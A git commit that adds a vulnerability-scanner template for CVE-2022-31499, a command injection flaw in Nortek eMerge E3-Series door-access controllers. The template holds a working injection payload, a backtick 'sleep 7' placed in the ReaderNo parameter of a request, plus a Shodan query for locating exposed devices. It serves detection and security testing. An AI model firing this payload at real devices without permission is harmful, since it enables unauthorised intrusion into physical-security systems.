Merge pull request #5454 from pikpikcu/patch-341

Added CVE-2022-31499
2023-02-10 19:54:20 +05:30 · 2023-02-10 19:54:20 +05:30 · 88312b24ee
parent 33eaf2fcf0 dc99430f95
commit 88312b24ee
1 changed files with 34 additions and 0 deletions
--- a/cves/2022/CVE-2022-31499.yaml
+++ b/cves/2022/CVE-2022-31499.yaml
@ -0,0 +1,34 @@
+id: CVE-2022-31499
+
+info:
+  name: eMerge E3-Series - Command Injection
+  author: pikpikcu
+  severity: critical
+  description: |
+    Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256 .
+  reference:
+    - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
+    - https://github.com/omarhashem123/CVE-2022-31499
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31499
+  classification:
+    cve-id: CVE-2022-31499
+  metadata:
+    verified: true
+    shodan-query: title:"eMerge"
+  tags: cve,cve2022,emerge,rce
+
+requests:
+  - raw:
+      - |
+        @timeout: 15s
+        GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - duration>=7
+          - contains(all_headers, "text/html")
+          - status_code == 200
+          - contains(body, '{\"CardNo\":false')
+        condition: and